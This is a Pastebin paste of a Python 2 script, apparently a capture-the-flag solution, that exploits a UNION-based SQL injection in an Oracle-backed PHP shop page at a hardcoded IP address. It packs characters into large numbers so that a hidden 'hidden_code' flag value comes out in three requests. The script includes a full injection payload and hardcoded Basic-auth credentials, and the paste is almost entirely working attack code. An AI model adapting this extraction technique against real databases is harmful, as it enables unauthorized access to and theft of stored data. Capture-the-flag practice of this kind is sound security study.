daily pastebin goal
80%
SHARE
TWEET

Untitled

a guest Jan 27th, 2014 370 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #
  3. # Though exploited function has to return ONLY numeric value
  4. # we still can to reduce number of SQL requests to extract flag value
  5. # due to Orcale's ability to operate with quite BIG numbers.
  6. #
  7. # Down here how to obtain flag with just THREE requests:
  8. # ONE for flag's length extracting and TWO for extracting flag itself
  9. #
  10.  
  11. from urllib2 import urlopen, Request
  12. import re
  13. import base64
  14.  
  15. MAX_LEN = 16
  16. username = 'admin'
  17. password = 'P@ssw0rd9823_#@!hhqqyi'
  18.  
  19. def numerize(name, length):
  20.  
  21.         res=[]
  22.         r=''
  23.  
  24.         parts = length // MAX_LEN
  25.         p = MAX_LEN if parts else length
  26.  
  27.         for i in range(length):
  28.                 r += 'ascii(substr(' + name + ',' + str(i + 1) + ',1))*power(256,' + str(p - i % MAX_LEN - 1) + ')%2b'
  29.                 if i % MAX_LEN == MAX_LEN - 1:
  30.                         res.append(r[:-3])
  31.                         parts -= 1
  32.                         r=''
  33.                         p = MAX_LEN if parts else length - i - 1
  34.         if r: res.append(r[:-3])
  35.         return res
  36.  
  37.  
  38. url = 'http://195.133.87.173/address_shops.php?city='
  39. v = "flag''+union+select+to_char(PHD_IV_OWNER2.shop_private_pkg.get_product_quantity(''''''union+select+$PAYLOAD$+from+secret_products+where+hidden_code+is+not+null--''))+from+dual--"
  40. creds = base64.b64encode('%s:%s' % (username, password))
  41. pat = re.compile('<tr>(\d+)</tr>')
  42. column_name = 'hidden_code'
  43.  
  44. payload = 'length(%s)' % column_name
  45.  
  46. print 'Extracting flag length: ',
  47. request = Request(url + v.replace('$PAYLOAD$',payload))
  48. request.add_header("Authorization", "Basic %s" % creds)
  49. resp = urlopen(request).read()
  50.  
  51. l = int(re.search(pat, resp).groups()[0])
  52. print l
  53.  
  54. payloads = numerize(column_name, l)
  55.  
  56. print 'Extracting flag: ',
  57. flag = ''
  58. for payload in payloads:
  59.         request = Request(url + v.replace('$PAYLOAD$',payload))
  60.         request.add_header("Authorization", "Basic %s" % creds)
  61.         resp = urlopen(request).read()
  62.         f = str(hex(int(re.search(pat, resp).groups()[0])))[2:]
  63.         if f.endswith('L'): f = f[:-1]
  64.         flag +=  f.decode('hex')
  65. print flag
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top